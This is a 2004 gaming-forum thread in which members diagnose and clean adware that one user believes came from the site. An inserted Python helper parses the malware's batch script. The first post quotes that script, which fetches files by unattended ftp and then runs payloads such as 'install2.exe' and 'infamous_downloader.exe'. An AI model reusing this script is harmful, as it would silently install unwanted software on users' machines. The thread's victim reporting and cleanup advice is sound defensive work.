
Foistware from CFC?

Discussion in 'Site Feedback' started by scoutsout, May 20, 2004.

  1. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    Last night this was the only site I logged onto - therefore, I believe the things that were foisted onto my machine came from, or through, this site. I left the connection on when I went to bed. At some point the connection was dropped (thanks for small favors).

    After closing down some "risque" browser windows, I re-booted. After the machine came back up, the "dial-up dialog" immediately popped up. Hmmm... something is trying to "phone home".

    I found the following modifications to my system:

    Running processes
    loader
    id53
    pef

    New desktop Icons:

    Lycos Sidesearch
    appears to be a browser hijack

    0021-bdl94126.exe
    No information given in "properties", but icon was a "setup" icon.

    CS4P20.exe
    Company Name: Clear Search
    Product Name: Loader

    "o"
    No information given in "properties"

    "o.bat"
    Commands as follows:

    if not exist C:\WINDOWSstatuslog ftp -s:o
    if exist install2.exe install2.exe
    if exist infamous_downloader.exe infamous_downloader.exe
    if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
    if exist CS4P028.exe CS4P028.exe
    if exist silent.exe silent.exe

    "infamous_downloader.exe"
    No information given in "properties"

    install2.exe
    Company Name: TODO
    Product Name: Spawner.exe

    silent.exe
    No information given in "properties"

    New folder under c: "installer", with "id53.exe" in it
    New folder under c: "temporary", with stcterms.html in it

    New Windows Startup Items:
    PowerReg Scheduler.exe
    PowerRegSchedulerV3.exe

    In c:\windows
    "infamous.exe"

    In the program files directory
    New Folder "Lycos"
    New programs "over.exe" and "pup.exe"

    After cleaning all of this crap out, starting internet explorer, my browser was hijacked to the following:

    http://default-homepage-network.com/start.cgi?hkcu

    This morning I see we now have popup windows on the forums side of CFC. That really is too bad.
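
An added example, not part of the original post: a small triage helper that reads the `o.bat` lines quoted above and reports the scripted `ftp -s:` fetch and the chain of executables the script would start. The function names and the directory listing used with `present_on_disk` are assumptions made for illustration.

```python
import re

# The o.bat lines exactly as quoted in the post above (input for triage).
O_BAT = r"""if not exist C:\WINDOWSstatuslog ftp -s:o
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe
"""

# "if [not] exist <path> <command>" is the only construct this script uses.
IF_EXIST = re.compile(r"^\s*if\s+(not\s+)?exist\s+(\S+)\s+(.+?)\s*$", re.I)
# "ftp -s:<file>" runs the Windows ftp client unattended from a command file.
FTP_SCRIPT = re.compile(r"^ftp(?:\.exe)?\b.*?\s-s:(\S+)", re.I)


def triage_batch(text):
    """Classify each 'if exist' line of a captured batch script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = IF_EXIST.match(line)
        if not m:
            continue
        negated, guard, command = bool(m.group(1)), m.group(2), m.group(3)
        ftp = FTP_SCRIPT.match(command)
        if ftp:
            # Download step; a "not exist" guard is a run-once marker file.
            findings.append({"line": lineno, "kind": "scripted-ftp",
                             "command_file": ftp.group(1),
                             "skip_marker": guard if negated else None})
        elif not negated and command.split()[0].lower() == guard.lower():
            # "if exist X X": start X if the download delivered it.
            findings.append({"line": lineno, "kind": "run-if-present",
                             "target": guard.lower()})
        else:
            findings.append({"line": lineno, "kind": "other", "command": command})
    return findings


def payload_names(findings):
    """Lower-cased file names the script would execute, in order."""
    return [f["target"] for f in findings if f["kind"] == "run-if-present"]


def present_on_disk(findings, listing):
    """Names from a directory listing that match a payload, ignoring case."""
    wanted = set(payload_names(findings))
    return sorted(name for name in listing if name.lower() in wanted)
```

Matching is case-insensitive because the script itself mixes `.exe` and `.EXE`, and Windows file names are not case-sensitive.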
     
  2. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    Would somebody please verify if the company propagating this popup is popping it up through CFC Forums? I mean, come on people, my wife thinks American Photographer is porn. I really don't need stuff like this when I'm trying to read a turnlog:

     
  3. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    You've probably got it from somewhere else if it's popping up whilst actually browsing the forum, since you should only get adverts on the main page.
     
  4. Knight-Dragon

    Knight-Dragon Unhidden Dragon Retired Moderator

    Joined:
    Jun 25, 2001
    Messages:
    19,963
    Location:
    Singapore
    We, at CFC, don't condone this. TF will surely raise a complaint with our site host, and ask them to remove it (if it's from here) - since we're a family friendly site.
     
  5. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    @XIII: Thank you. I can't ask any more than for someone in the know to check it out.

    @Dell19: at the time that thing popped up, there were no suspicious processes running (Explorer, systray, rnapp, and one MSIE window, nothing else) and I was on CFC forums, reading a turnlog. I'm 99% sure I got rid of everything that was foisted. I have "forums.civfanatics.com" bookmarked, and that's usually the way I enter this site... because the main page has popups. All I can do is describe what I see going on...
     
  6. MarineCorps

    MarineCorps Explosion!

    Joined:
    Jun 26, 2003
    Messages:
    8,187
    Gender:
    Male
    Location:
    Cape Cod
    I just scanned my computer and all I found were a bunch of tracking cookies. But on a semi different note no Red Serrif..... :confused:
     
  7. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    I also should have mentioned - AdAware caught NONE of this stuff. Also - when I closed my browser earlier, I got a popup. I see three possibilities (someone please tell me if they see another):

    1) Something still has my browser 'hooked' after the foistware routine.
    2) There's a TSR process running that's invisible to the task manager
    3) There's something in the scripts/code that make up the pages of the forums.

    Believe it or not, I'm hoping it's #1.
     
  8. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    Have you tried updating adaware to get the latest updates?
     
  9. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    Okay - the forums side seems to be behaving nicely from work... so that eliminates #3. I'm still fairly certain that the foistware came from a popup window off the main site (I surfed it a little last night too...) but at least the problem seems to be somewhat isolated.

    @Dell - thanks for your interest/concern/help/advice... I appreciate it. I'll check back in here after I spend some time on my machine this evening.
     
  10. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    I have to have something to do to distract me from revising...
     
  11. eyrei

    eyrei Deity Retired Moderator

    Joined:
    Nov 1, 2001
    Messages:
    9,162
    Location:
    Cary, NC USA
    When was the last time you rebooted before you visited CFC? Often, software like that doesn't start functioning until the computer reboots, as the instructions to install and run the programs are in the registry and autoexec files. There is some spyware that you might get from CFC, but none of it seems malignant like you are describing.
     
  12. RoddyVR

    RoddyVR Veteran Board NESer

    Joined:
    Mar 29, 2002
    Messages:
    4,210
    Location:
    Russian in US
    scoutsout,

    I had the same thing a while back (popups from out of nowhere and other evilness). Was sure it was CFC that was doing it. Ran a couple of the AdAware and the like scanners. They cleaned off a couple things, but it was still happening.
    SpyBot S&D found 3 more though, and after that it all stopped.

    It seems to me that all these scanning/cleaning softwares don't have ALL the spyware/adware progs listed in them, so they don't always catch everything. Try DLing another cleaner (Spybot seems to be a good free one for me).

    The fact that it's coming up during CFC browsing doesn't really mean anything.
    If you want to run a clean test, try rebooting your machine then going to like MSN.com or CNN or something and leaving it there overnight, see if the popups come around again. If they do, it's not CFC, it's another adware/spyware on your system that your cleaner software didn't find and doesn't know about (you have updated it, right?)
     
  13. eyrei

    eyrei Deity Retired Moderator

    Joined:
    Nov 1, 2001
    Messages:
    9,162
    Location:
    Cary, NC USA
    Download hijackthis from that site. Their forum also has some very useful information.
     
  14. Paalikles

    Paalikles Emperor

    Joined:
    Nov 28, 2001
    Messages:
    1,536
    Some spyware...that's an understatement :lol:

    My advice:

    www.spybot.info <-- Spybot Search and Destroy
    combined with adaware (remember to configure adaware to do a deepscan + search compressed archives)
    www.trendmicro - use housecall if you don't have your own virus scanner. I use Trendmicro's internet security, which also detects malware and spyware - so I reckon their free tool Housecall will also do that.

    Configure IE to ask you before accepting cookies - that may not do much, but afaik it provides at least some benefit.
    http://www.javacoolsoftware.com/spywareblaster.html is another good tool to combat spyware
    also try the spywareguard from the same company (check under the download section)

    Also - remember that some malware is more harmless than others: I recently removed a trojan from a friend's computer "small.5" which does not deliver a destructive payload, but hangs the computer. I removed the running process, and manually deleted the program - then the machine showed no infections ;)
     
  15. Civrules

    Civrules We the People

    Joined:
    Apr 6, 2003
    Messages:
    5,621
    Gender:
    Male
    Location:
    US
  16. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
  17. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    Probably, although they may not all be exactly the same problem as only a few posters seem to suffer from this.
     
  18. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    At the risk of sounding argumentative, we know that only a few posters are posting about this. We don't know that only a few posters are suffering from this. Two similar threads started on the same day sounds a little suspicious to me.

    And I just remembered that this machine I'm on now has a different OS and some different software that makes it a little harder for me to have foistware downloaded to this machine without my explicit consent.

    @Roddy (and others) Got Spybot. Thanks!
     
  19. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    You might be correct but two is only one more than one so both possibilities have a reasonable chance of being correct at the moment. Another thing that might be helping me is that I am behind a university firewall.
     
  20. shirleyrocks

    shirleyrocks Prince

    Joined:
    Oct 29, 2001
    Messages:
    441
    Location:
    Chicago
    Well, how about three people then? This afternoon, just as I was entering the CFC website, my anti-virus software popped up with an alert notification. Something along these lines (from my logfile)...

    Action: File Deleted
    Infection: HTML.MHTMLRedir.Exploit
    Infection Type: Trojan

    I think Thunderfall's host is feeding him some bad pop-ups.
     
